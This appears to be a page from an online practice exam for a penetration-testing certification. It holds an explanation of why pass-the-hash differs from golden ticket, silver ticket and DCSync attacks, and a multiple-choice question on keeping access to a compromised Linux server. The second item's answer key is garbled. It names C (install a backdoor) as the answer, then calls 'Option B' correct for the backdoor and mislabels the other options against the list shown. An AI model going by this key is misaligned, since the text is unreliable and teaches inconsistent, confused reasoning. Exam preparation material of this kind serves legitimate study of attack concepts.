The trap here is that candidates often confuse pass-the-hash with Kerberos-based attacks (golden/silver tickets) or DCSync, but the key differentiator is that plaintext passwords in memory enable direct NTLM authentication, not ticket forgery or replication attacks.

How to eliminate wrong answers

Option A is wrong because a golden ticket requires forging a Kerberos TGT using the KRBTGT account's hash, which is not obtained from plaintext passwords in memory of a standard user; it requires domain admin privileges or a DCSync attack. Option B is wrong because a silver ticket forges a service ticket (TGS) using the service account's NTLM hash, which does not grant domain admin privileges and is limited to a specific service. Option D is wrong because a DCSync attack requires domain admin or equivalent privileges to replicate directory data; it cannot be executed from a standard user account, even with plaintext passwords.

75
MCQeasy

A penetration tester has discovered a vulnerable service running on a Linux server that allows remote code execution. Which of the following is the most appropriate next step to maintain access?

A.Clear all system logs to avoid detection
B.Immediately report the finding to the client
C.Install a backdoor for persistent access
D.Escalate privileges to root
AnswerC

A backdoor ensures the tester can re-enter the system if needed.

Why this answer

Option B is correct because after gaining initial access, installing a backdoor ensures persistent access. Option A is wrong because erasing logs prematurely could alert defenders. Option C is wrong because privilege escalation may not be necessary if current access is sufficient.

Option D is wrong because reporting should occur after the engagement, not during.

Page 1 of 2 · 101 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Attacks And Exploits questions.